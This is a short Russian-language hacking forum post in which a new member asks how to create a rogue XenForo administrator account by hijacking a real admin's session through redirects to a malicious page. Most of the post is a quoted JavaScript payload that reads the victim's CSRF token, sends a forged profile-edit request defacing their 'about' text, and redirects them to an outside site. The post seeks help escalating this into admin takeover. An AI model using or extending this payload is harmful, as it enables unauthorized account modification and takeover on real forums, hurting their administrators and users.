17.07.2015, 12:20
|
|
Новичок
Регистрация: 17.07.2015
Сообщений: 2
Провел на форуме:
362
Репутация:
0
|
|
Доброе время суток. В поисках ответа на свой порос я пришел к Вам, так-как тут говорят что есть знающие люди. Суть вопроса такова: как создать новую учетную запись администратора на XenForo через подмену куки реального администратора методом редиректов на страницу с вредоносным кодом?
Вдохновился статьей одного из модераторов yarbabin где он показывал как обычным редиректом на страницу с вредоносным кодом можно было изменять подписи.
Код HTML:
$(document).ready(function pwn() {
$(document.body).hide();
$('html').css('background-color','#fff');
var getcsrf = document.body.innerHTML;
var re = new RegExp('_csrfToken: "(.*)"', 'ig');
token = re.exec(getcsrf)[1];
var xhr = new XMLHttpRequest();
var body = 'about_html=%3Cp%3EPWNED+BY+%3Ca+href%3D%22https%3A%2F%2Fbhf.su%2Fmembers%2F71790%2F%22+class%3D%22internalLink+ProxyLink%22+data-proxy-href%3D%22https%3A%2F%2Fbhf.su%2Fmembers%2F71790%2F%22%3EYARBABIN%3C%2Fa%3E%3C%2Fp%3E%0D%0A&_xfRelativeResolver=https%3A%2F%2Fbhf.su%2Faccount%2Fpersonal-details&save=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C+%D0%B8%D0%B7%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F&_xfRequestUri=%2Faccount%2Fpersonal-details&_xfNoRedirect=1&_xfToken=' + encodeURIComponent(token) + '&_xfResponseType=json';
xhr.open("POST", '/account/personal-details-save', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send(body);
document.location.href='https://yarbabin.ru/dorkgen/dorkgen.php';
});
Есть-ли люди знающие как реализовать данную затею? |
|
|